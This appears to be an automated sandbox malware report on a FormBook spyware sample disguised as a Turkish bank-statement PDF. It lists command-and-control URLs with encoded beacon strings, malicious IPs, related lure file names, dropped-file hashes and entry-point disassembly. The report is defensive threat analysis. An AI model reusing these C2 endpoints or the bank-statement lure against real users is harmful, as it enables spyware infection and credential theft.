                                      http://www.ladybillplanet.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.assilajamiart.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fluxgreenn.space/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ixirwholesale.xyzexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.yeah-go.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-912K03JO.9.drfalse
                                        		high
                                        http://www.bemmulher.online/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.hubyazilim.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nortonseecurity.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        107.148.8.96
                                        		www.wenzid4.topUnited States
                                        		54600PEGTECHINCUStrue
                                        194.102.227.30
                                        		cutgang.netRomania
                                        		12302VODAFONE_ROCharlesdeGaullenr15ROtrue

                                        General Information

                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                        Analysis ID:814000
                                        Start date and time:2023-02-23 10:22:55 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 9m 48s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:17
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@12/5@5/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 71.8% (good quality ratio 66%)
                                        • Quality average: 77.1%
                                        • Quality standard deviation: 31.2%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 73
                                        • Number of non-executed functions: 88
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        10:24:00API Interceptor898x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        107.148.8.96Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?Azs=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==&OGpK-=bVTY_sdT7
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?vpSIji=FtOCfte77t4rqa&kNvk2d=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oG
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                        Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?D-=o7lM_tn4_0HKLAP&gXaj8V=MOY5/0rZkCSn1x8B4WS0du0mnN5KW3C6NMBU4rUAiJ09dU/WDm+Fx0/u9tK3DtQGeLOXEwxSHBLi0tUrRAF3Ahbx+eXoKIAlFQ==
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==
                                        captain.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?Z-y-ON=FXxQJAlmPf&5B=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                        6TY2Qkw9KV.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/t36v/
                                        love pas.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?krza2P=8Vw3GJ&ol9GzD=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                        • www.wenzid4.top/ghii/?PCWgxGWo=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&9KUw=bksF2HZ2yak7Rbe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        www.wenzid4.topHalkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        captain.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        6TY2Qkw9KV.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        love pas.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        some one.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        PEGTECHINCUSHalkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        ijUbCPKxVM.exeGet hashmaliciousUnknownBrowse
                                        • 107.148.49.247
                                        disMNajJNY.exeGet hashmaliciousFormBookBrowse
                                        • 154.195.83.5
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        ZiraatEkstre_202301.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 107.149.230.42
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 154.195.83.1
                                        http://kickboxingathome.comGet hashmaliciousUnknownBrowse
                                        • 104.219.208.2
                                        http://137.175.17.190/jawsGet hashmaliciousUnknownBrowse
                                        • 137.175.17.190
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 154.195.83.1
                                        captain.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        TRANSFER CONFIRMATION.exeGet hashmaliciousFormBookBrowse
                                        • 198.2.192.82
                                        4iLDIlbK8X.elfGet hashmaliciousMiraiBrowse
                                        • 45.205.88.130
                                        TT Swift($42,072)2.2.23.exeGet hashmaliciousFormBookBrowse
                                        • 107.149.76.98
                                        y2OSL6rKkW.exeGet hashmaliciousFormBookBrowse
                                        • 142.4.98.152
                                        6TY2Qkw9KV.exeGet hashmaliciousFormBookBrowse
                                        • 107.148.8.96
                                        VODAFONE_ROCharlesdeGaullenr15ROHalkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        Payment INV NO. 230203-1USD.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        i2hCoUCBwo.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 81.12.165.53
                                        T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        cnf13429226.vbsGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        captain.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        W3NFvcKgsq.elfGet hashmaliciousMiraiBrowse
                                        • 81.12.165.89
                                        love pas.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        some one.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                        • 194.102.227.30
                                        YYwHP01CiA.elfGet hashmaliciousUnknownBrowse
                                        • 136.255.26.39
                                        DeGHXF1WPn.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 81.12.215.12
                                        AqLkwwh89S.elfGet hashmaliciousMiraiBrowse
                                        • 136.255.15.144
                                        ZBdhdOCSw8.elfGet hashmaliciousMiraiBrowse
                                        • 46.97.220.69
                                        zMxKF1sZ6K.dllGet hashmaliciousWannacryBrowse
                                        • 46.97.87.42

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\-912K03JO

                                        Download File
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                        Category:dropped
                                        Size (bytes):94208
                                        Entropy (8bit):1.2882898331044472
                                        Encrypted:false
                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\dlcmto.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):93184
                                        Entropy (8bit):6.265711016521524
                                        Encrypted:false
                                        SSDEEP:1536:X98hcqsv2Z8lCWr9/Ixv4c6C1nVitMuAMg98z24khRrk1F0wdnubmfs7DqAm:3qE2Z8KF6C1nVitMuG98z24kz45duFDk
                                        MD5:00463A9A4FBFEE77A95181CC2C45A9B4
                                        SHA1:38C06685E9092BAF0E6BF3EA955AE60A7BC22FFB
                                        SHA-256:E57EE28B950FEAFCB387898BA2E2F39C9C5F4C396E8AD283D0DFCA6B124EDC4F
                                        SHA-512:94D32E21A6F9FAC23DFA6996B8B9E92F7B69026FA6765A5648EDC8C82FD21FB40E3DD850E504974D736B6411D973812099595DCA32B0E266FE6943B74DB7087D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 23%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...I..c............................b.............@.......................................@..................................M.......................................L..............................0................P..$............................text............................... ..`.rdata..,a.......b..................@..@.data....&...p.......J..............@....00cfg...............V..............@..@.voltbl..............X...................rsrc................Z..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\nsh9334.tmp

                                        Download File
                                        Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):320949
                                        Entropy (8bit):7.603147106851391
                                        Encrypted:false
                                        SSDEEP:6144:fz7AXcrXBx13lQ21t85n4jpUnGHGtxCeym:foXcrXBxTQYtG4MGjm
                                        MD5:C80B0CF60CBD4C3685707A8E3CCF2949
                                        SHA1:C0DDBEF1E6C059095BA489EF8EE042839F6D2D99
                                        SHA-256:E96EEEE100F28263D6038818837A7EB99C4EA37404CB9FF938B4A3FC6263EAEC
                                        SHA-512:2DD957D7E1CC6B6A7963F063460ABA8C36CD552C4F9D589275823E0C89DF45C4ABE4F63A44C3998302FF51B1362929CD2071958E06743ADC1D51068240327C67
                                        Malicious:false
                                        Preview:r,......,...................j...t........+......Z,..........................................................................................................................................................................................................................................G...................j...........................................................................................................................................0...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\osqafruepl.xf

                                        Download File
                                        Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5708
                                        Entropy (8bit):7.169512235328432
                                        Encrypted:false
                                        SSDEEP:96:Farc6oYUg/DrYuok2XO5oSwg3vV+NSZii0VxDI8u3Rumm88w5d8r1YZt:FarcRAghX1Sl3qSZii0VG8RbAdeSL
                                        MD5:68CE871A5C88F77B16101B789FD487CF
                                        SHA1:2AC919C15E4373084B6063BA00C3E1B9F1410ECC
                                        SHA-256:C78C4FB20896E73C59C7D4FEA64B0ECF9983B4D8EC08B5A594D872BD172A47C7
                                        SHA-512:8970E2280C94190D72196E29957946F23F8BB7229D26F1BEB4D6B17E0D97E5B2A41D680E4B3817693B358458D6AD5750E671DE8B8170AC4701CC7289652F63FA
                                        Malicious:false
                                        Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                        C:\Users\user\AppData\Local\Temp\pesmn.c

                                        Download File
                                        Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):210663
                                        Entropy (8bit):7.998877370476781
                                        Encrypted:true
                                        SSDEEP:3072:qXwz7t7uXqzrc69M2x1Zk+GMkhD+Y2JHtwVLGAXnJNoDSmievxP/ZQq0OBKX:3z7AXcrXBx13lQ21t85n4jpUX
                                        MD5:88FC03E4BD367B8613672F7BBD6163DC
                                        SHA1:15F80739F4E26F28C654629528A9FEE036F1D3EB
                                        SHA-256:A4494B3C2080F84105E03A4AF9ED08186772696D45F7223546AF8482916D2DD9
                                        SHA-512:27B899EB10379C7D7D535A597D484E863155794AAFE14CFB182B86A2CF7657AC6725E3A67F48791E075639E4220EAFC378C9F2B187132BE467EAA4361F2525AC
                                        Malicious:false
                                        Preview:...;G"7d,.^..H....G...#/.I.../*.>..J."g..gr.`....F..I...:.Q..(..m.W.^<yM1]!q.<......,..7M....p.L.}....V..\....t.....l@....=Y...yB.T..L.g...#G.tz.*u....+k.....f........H.r{.....!W\.C.f.S.H0..*.M......kD..;.IJo..w..... 2.].R..s.b._.a.H+.R.."[T.......G/."7d."...b../.@...S.R.T.Rx>..Jc"g...r......F..I...:.Q..(.EtE.....C ...).V.6.]K^.9.!P......|..m...Z.*X...=P.P.v....=Y..z8...`......B?_n._'..l...V..'.`......Y.R.......!W\....IS.H.+@*Ie.9...7kD..;.CJ.2.b....O.2.].R..s.T._.D.H.=R..[T...u..(.G/."7d,."...b....@...S.R.8.*.>..J."g..gr.`....F..I...:.Q..(.EtE.....C ...).V.6.]K^.9.!P......|..m...Z.*X...=P.P.v....=Y..z8...`......B?_n._'..l...V..'.`......Y.R.......!W\.C.f.S.H=..*I..E....kD..;.CJ.2.b....O 2.].R..s.T._.D.H.=R..[T...u..(.G/."7d,."...b....@...S.R.8.*.>..J."g..gr.`....F..I...:.Q..(.EtE.....C ...).V.6.]K^.9.!P......|..m...Z.*X...=P.P.v....=Y..z8...`......B?_n._'..l...V..'.`......Y.R.......!W\.C.f.S.H=..*I..E....kD..;.CJ.2.b....O 2.].R..s

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.926012659673141
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        File size:299068
                                        MD5:9ad124bf22839603024a373ba636532b
                                        SHA1:50f0b83d0deb5b40e8b306e4122ae3c1173eda1e
                                        SHA256:c448049c359c9ada55dbdefbb772020aa3962804d485ccf52adefb3a2030e3fb
                                        SHA512:a3fad0e51e18242beb6d6ca62d1fe63e30d3836d6317a7bead6f620d48ba0ad5ade4a6c91ca37d14ac4c034a00479179ad6af37b2cd975e2b2158d92884dfac9
                                        SSDEEP:6144:PYa6+qrPPkjGY0tiVyVtCqNJNMxUD7W4POTptedBjmI7bLbp5Z:PYAqrXsGYQtCqNrRPPuedhj7bLbZ
                                        TLSH:515413C93790D3B7C0BB02F13A2A6626FFF9553509A4461F570177ADF5B1A42EA0E322
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                        File Icon

                                        Icon Hash:b2a88c96b2ca6a72

                                        Static PE Info

                                        General

                                        Entrypoint:0x403640
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:61259b55b8912888e90f516ca08dc514

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 000003F4h
                                        push ebx
                                        push esi
                                        push edi
                                        push 00000020h
                                        pop edi
                                        xor ebx, ebx
                                        push 00008001h
                                        mov dword ptr [ebp-14h], ebx
                                        mov dword ptr [ebp-04h], 0040A230h
                                        mov dword ptr [ebp-10h], ebx
                                        call dword ptr [004080C8h]
                                        mov esi, dword ptr [004080CCh]
                                        lea eax, dword ptr [ebp-00000140h]
                                        push eax
                                        mov dword ptr [ebp-0000012Ch], ebx
                                        mov dword ptr [ebp-2Ch], ebx
                                        mov dword ptr [ebp-28h], ebx
                                        mov dword ptr [ebp-00000140h], 0000011Ch
                                        call esi
                                        test eax, eax
                                        jne 00007F935CAB679Ah
                                        lea eax, dword ptr [ebp-00000140h]
                                        mov dword ptr [ebp-00000140h], 00000114h
                                        push eax
                                        call esi
                                        mov ax, word ptr [ebp-0000012Ch]
                                        mov ecx, dword ptr [ebp-00000112h]
                                        sub ax, 00000053h
                                        add ecx, FFFFFFD0h
                                        neg ax
                                        sbb eax, eax
                                        mov byte ptr [ebp-26h], 00000004h
                                        not eax
                                        and eax, ecx
                                        mov word ptr [ebp-2Ch], ax
                                        cmp dword ptr [ebp-0000013Ch], 0Ah
                                        jnc 00007F935CAB676Ah
                                        and word ptr [ebp-00000132h], 0000h
                                        mov eax, dword ptr [ebp-00000134h]
                                        movzx ecx, byte ptr [ebp-00000138h]
                                        mov dword ptr [0042A318h], eax
                                        xor eax, eax
                                        mov ah, byte ptr [ebp-0000013Ch]
                                        movzx eax, ax
                                        or eax, ecx
                                        xor ecx, ecx
                                        mov ch, byte ptr [ebp-2Ch]
                                        movzx ecx, cx
                                        shl eax, 10h
                                        or eax, ecx

                                        Rich Headers

                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xce8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x3b0000xce80xe00False0.42410714285714285data4.238487265233597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                        RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                        RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                        RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                        RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
